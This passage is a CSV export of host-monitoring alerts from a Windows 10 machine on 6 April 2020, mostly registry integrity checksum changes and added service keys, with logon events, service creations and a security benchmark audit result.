'b132e65b4963a54ebee91bcab8914621' +New md5sum is : 'c34dba122b585a1a9fc22f989595a44d' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '13bfcb7f528aac84a974a2b81bfa80d7ff9044eb' +" +"Apr 6, 2020 @ 13:30:32.464",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:32.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:32.274",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : 'b48da839ebcc8fd3a431cbe7afcdf7db' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '5195811f2b346097acfba0ad56e24cc27e0880d4' +" +"Apr 6, 2020 @ 13:30:31.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '5058b6566544015230dcf294c7d65602' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : 'c5dc49dba107b0b0c04dd16ef44c114e5aca3cc7' +" +"Apr 6, 2020 @ 13:30:31.274",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:31.259",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:31.057",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'b6c30bd0f7982fcdb50ea0551b18b76a' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '92e731a5f80369750a273e8b7706936de9fee902' +" +"Apr 6, 2020 @ 13:30:28.665",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : 'abcf5555a1da768678af92dfe0c6d696' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : '14b9c4ed780b00e384e8a1a1a64a6d384c174d76' +" +"Apr 6, 2020 @ 13:30:25.152",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 6, 2020 @ 13:30:23.307",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 6, 2020 @ 13:30:23.291",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '606d75503289ffec78fec11236a6353e' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '33248c131c57ed1e3d99fa341dabe7bf3cbac974' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 6, 2020 @ 13:30:22.092",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:30:20.492",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rtop' was added. +" +"Apr 6, 2020 @ 13:30:16.793",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 13:30:16.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 6, 2020 @ 13:30:14.214",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:14.167",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:13.527",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:13.510",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:12.088",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:12.073",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:09.597",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '2edfb9880b6098db85771f92c9abb21d' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '8e2af586654b1569e070c4fbc76e28dd2cc1a33c' +" +"Apr 6, 2020 @ 13:30:07.470",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '96a9b30c9b670b5333e983dfff05161e' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '1f4308d6a0398f5915ad9c727b72a267522aeb07' +" +"Apr 6, 2020 @ 13:30:06.865",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'ef961e75cd8476aa24c4850d5f34bb92' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '12e3ceb622a95a7de264239c90285cbf232e3d7b' +" +"Apr 6, 2020 @ 13:30:06.408",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:06.393",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2e21c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 13:30:06.377",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:02.537",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '2e3c26ab82f3d212e01c7a36fc87e1ec' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'e67dc24f9e201074962e2d341bd44cd6014de972' +" +"Apr 6, 2020 @ 13:30:01.077",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '2edfb9880b6098db85771f92c9abb21d' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '8e2af586654b1569e070c4fbc76e28dd2cc1a33c' +" +"Apr 6, 2020 @ 13:29:58.330",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'd0b308c687ee3018a3e8ad3d204cdf92' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : '0a764c05763acb9617f6d67fd394706d90d4fe38' +" +"Apr 6, 2020 @ 13:29:55.588",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '2edfb9880b6098db85771f92c9abb21d' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '8e2af586654b1569e070c4fbc76e28dd2cc1a33c' +" +"Apr 6, 2020 @ 13:29:54.883",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 6, 2020 @ 13:29:47.142",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '772650c532656a63c572e644821e1138' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : '8023d90d0ef1e2ee05a05b3080d7877330bed279' +" +"Apr 6, 2020 @ 13:29:46.758",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:29:46.720",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:29:40.683",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '4355f5af433e33161d371707419074f9' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '3f350c977db6ef5cb56ce92a575886c27523c9ed' +" +"Apr 6, 2020 @ 13:29:38.972",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.956",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:38.885",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:38.554",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.539",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:38.269",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.253",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:37.817",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:37.794",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:37.632",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'b6c30bd0f7982fcdb50ea0551b18b76a' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '92e731a5f80369750a273e8b7706936de9fee902' +" +"Apr 6, 2020 @ 13:29:36.421",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:36.406",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:36.235",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:36.218",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:36.150",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:36.134",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:31.819",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:31.800",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 13:29:31.780",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 13:29:31.760",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 13:29:31.745",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 13:29:31.730",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 13:29:31.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:31.559",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +" +"Apr 6, 2020 @ 13:29:30.732",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:30.716",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:30.443",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '5c2789a3112e2515c4253933675975b9' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '0edfc11e83f71540cb349c38152f86a97313e8d0' +" +"Apr 6, 2020 @ 13:29:30.422",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '3f3c8d4eab76f9c1e4724209182cc568' +New md5sum is : 'a22f75cfaec4ad1b3c6df4a877bca015' +Old sha1sum was: '90ad9da96f876fa6b320ea2ce0b841894ed10171' +New sha1sum is : 'c661a399d9af12513997815526adef9491bd9698' +" +"Apr 6, 2020 @ 13:29:30.384",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '19158517b97c6e17b77c71083777fdb7' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '9d28ea24dd53ffb9cbeb93060366bed3f459f844' +" +"Apr 6, 2020 @ 13:29:27.886",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:27.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:28:05.812",5,"New Windows Service Created", +"Apr 6, 2020 @ 13:27:52.746",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 13:27:30.927",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:27:24.286",3,"Windows User Logoff", +"Apr 6, 2020 @ 13:27:24.259",3,"Windows User Logoff", +"Apr 6, 2020 @ 13:27:24.256",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:24.208",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:22.584",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 13:27:21.551",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 6, 2020 @ 13:27:20.476",5,"Logon Failure - Unknown user or bad password", +"Apr 6, 2020 @ 13:27:18.740",3,"The Windows Search Service started", +"Apr 6, 2020 @ 13:27:17.855",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:27:17.366",3,"The database engine attached a database", +"Apr 6, 2020 @ 13:27:17.272",3,"The database engine is starting a new instance", +"Apr 6, 2020 @ 13:27:12.573",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 6, 2020 @ 13:27:09.479",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 13:27:09.167",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:09.148",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:08.051",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 13:27:07.070",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:27:05.412",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 6, 2020 @ 13:26:31.583",5,"File added to the system.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. +" +"Apr 6, 2020 @ 13:26:31.569",5,"File added to the system.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. +" +"Apr 6, 2020 @ 13:26:31.263",9,"Windows Application error event", +"Apr 6, 2020 @ 13:26:30.466",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 13:26:30.419",5,"WSearch was unavailable to handle a notification event", +"Apr 6, 2020 @ 13:26:18.966",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '1001857a0c2e447ee83837de258faa0c' +New md5sum is : '533a94b2450e9da9730f3a8885fa28e2' +Old sha1sum was: 'fbc2dd7a0e81aa1596139b7fd30adc4b1c4c5a0a' +New sha1sum is : '9672846ee400d5d6a6606768e5f890ec38b068f7' +" +"Apr 6, 2020 @ 13:26:18.950",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'af63d4f94ca9e3f1fe87b6ae7273058d' +New md5sum is : 'd63d1a2fa60db9999c4fc04f5bc8fdd6' +Old sha1sum was: '124fc4899978bb6cfac3fdef04b2c307d5cd5fb3' +New sha1sum is : '41b7674c2a780a3d91a2498b0320f63b453edc78' +" +"Apr 6, 2020 @ 13:25:15.778",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'd74b9379d08305e497c56152fdb706f3' +New md5sum is : '3f3c8d4eab76f9c1e4724209182cc568' +Old sha1sum was: '7a48fe7361e6af26c6d7190a1de9d8947193bdbf' +New sha1sum is : '90ad9da96f876fa6b320ea2ce0b841894ed10171' +" +"Apr 6, 2020 @ 13:23:55.365",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:23:33.568",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:22:32.958",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinZip Smart Monitor Service' was added. +" +"Apr 6, 2020 @ 13:22:26.744",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '739c6d2d68d0a44cac9f9abccc755f23' +New md5sum is : '1001857a0c2e447ee83837de258faa0c' +Old sha1sum was: 'd8b5d9ae2b0976732fb3d7029400309de8595252' +New sha1sum is : 'fbc2dd7a0e81aa1596139b7fd30adc4b1c4c5a0a' +" +"Apr 6, 2020 @ 13:22:26.651",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'af63d4f94ca9e3f1fe87b6ae7273058d' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : '124fc4899978bb6cfac3fdef04b2c307d5cd5fb3' +" +"Apr 6, 2020 @ 13:22:15.928",3,"Service startup type was changed", +"Apr 6, 2020 @ 13:22:15.865",5,"New Windows Service Created", +"Apr 6, 2020 @ 13:22:12.583",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '57ab90e49fe60d2be51eb285e9aa2af6' +New md5sum is : '994f998c5dbd64f894e3a172f6292260' +Old sha1sum was: 'e505871f21b51c8ee06d585c67180c9392dc7511' +New sha1sum is : '3e50fb45bc27fbf3a9660c5d20e74191dba6788e' +" +"Apr 6, 2020 @ 13:22:12.520",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'ce601cdb843959a2c4f6befe0c7a2242' +New md5sum is : 'd2d77583fde1e6691771b897129f28a0' +Old sha1sum was: '4f6e60f4444ced9303606d3b4d79d2fc73df8c24' +New sha1sum is : '19a05d2098ec06e6506559356f0168738c47e1a7' +" +"Apr 6, 2020 @ 13:21:38.639",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 13:21:24.621",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '6f93271d69b72b17c57d0ed14a8d7124' +New md5sum is : 'd74b9379d08305e497c56152fdb706f3' +Old sha1sum was: '43fd4f6341a282d60eb432c42415afc3f46dc022' +New sha1sum is : '7a48fe7361e6af26c6d7190a1de9d8947193bdbf' +" +"Apr 6, 2020 @ 13:20:51.413",3,"Service startup type was changed", +"Apr 6, 2020 @ 13:20:48.153",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\TabbedBrowsing' was added. +" +"Apr 6, 2020 @ 13:20:48.127",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}' was added. +" +"Apr 6, 2020 @ 13:20:48.110",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}' checksum changed. +Old md5sum was: 'eabef0d1f7faf9368acee28f84f9b211' +New md5sum is : '2a569169f4c48da58d55d87631b3625e' +Old sha1sum was: 'be8f5aa697bbfd3ee56c683cc08676dc72effdcd' +New sha1sum is : '2ff153ca41593d1937308f478acf09efa60a0930' +" +"Apr 6, 2020 @ 13:20:48.067",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main' checksum changed. +Old md5sum was: '1763e3f11e8f89848387ac81ad778aa5' +New md5sum is : 'e926791c45461d05188fa45b7dfbea50' +Old sha1sum was: '12d11f0fa820cffcd9480bcdf6f248b633070537' +New sha1sum is : 'f01955b750dd7024d0ec41bb6eb55cdeb3f2114a' +" +"Apr 6, 2020 @ 13:20:43.584",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}' was added. +" +"Apr 6, 2020 @ 13:20:43.561",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0804' was added. +" +"Apr 6, 2020 @ 13:20:43.529",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0412' was added. +" +"Apr 6, 2020 @ 13:20:43.520",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0411' was added. +" +"Apr 6, 2020 @ 13:19:11.902",5,"Logon Failure - Unknown user or bad password", +"Apr 6, 2020 @ 13:18:54.344",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'efb09c0f0bf4d2938e7e5edd05292c95' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '94076bcd2b1138dd0d35c7bf7dbef9de6e0b263f' +" +"Apr 6, 2020 @ 13:18:54.329",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'efb09c0f0bf4d2938e7e5edd05292c95' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '94076bcd2b1138dd0d35c7bf7dbef9de6e0b263f' +" +"Apr 6, 2020 @ 13:18:50.595",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:18:47.376",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:18:41.002",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '739c6d2d68d0a44cac9f9abccc755f23' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : 'd8b5d9ae2b0976732fb3d7029400309de8595252' +" +"Apr 6, 2020 @ 13:18:40.969",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 